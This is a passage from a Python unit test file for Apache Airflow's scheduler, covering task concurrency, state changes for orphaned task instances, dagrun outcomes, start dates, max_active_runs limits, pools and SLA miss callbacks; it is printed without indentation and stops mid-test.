# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create scheduler and mock calls to processor. Run duration is set
# to a high value to ensure loop is entered. Poll interval is 0 to
# avoid sleep. Done flag is set to true to exist the loop immediately.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor()
executor.queued_tasks
scheduler.executor = executor
processor = mock.MagicMock()
processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_root_after_dagrun_unfinished(self):
"""
DagRuns with one successful and one future root task -> SUCCESS
Noted: the DagRun state could be still in running state during CI.
"""
dag_id = 'test_dagrun_states_root_future'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id, num_runs=2)
# we can't use dag.run or evaluate_dagrun because it uses BackfillJob
# instead of SchedulerJob and BackfillJobs are allowed to not respect start dates
scheduler.run()
first_run = DagRun.find(dag_id=dag_id, execution_date=DEFAULT_DATE)[0]
ti_ids = [(ti.task_id, ti.state) for ti in first_run.get_task_instances()]
self.assertEqual(ti_ids, [('current', State.SUCCESS)])
self.assertIn(first_run.state, [State.SUCCESS, State.RUNNING])
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_without_tasks(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_without_tasks',
start_date=DEFAULT_DATE)
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear(session=session)
dag.start_date = None
dr = scheduler.create_dag_run(dag, session=session)
self.assertIsNone(dr)
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs
has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has
been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEqual(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler calls the sla miss callback
"""
session = settings.Session()
sla_callback = MagicMock()
# Create dag with a start of 1 day ago, but an sla of 0
# so we'll already have an sla_miss on the books.
test_start_date = days_ago(1)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta()})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
assert sla_callback.called
def test_scheduler_sla_miss_callback_invalid_sla(self):
"""
Test that the scheduler does not call the sla miss callback when
given an invalid sla
"""
session = settings.Session()
sla_callback = MagicMock()
# Create dag with a start of 1 day ago, but an sla of 0
# so we'll already have an sla_miss on the books.
# Pass anything besides a timedelta object to the sla argument.
test_start_date = days_ago(1)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': None})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_sent_notification(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
assert sla_callback.called
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
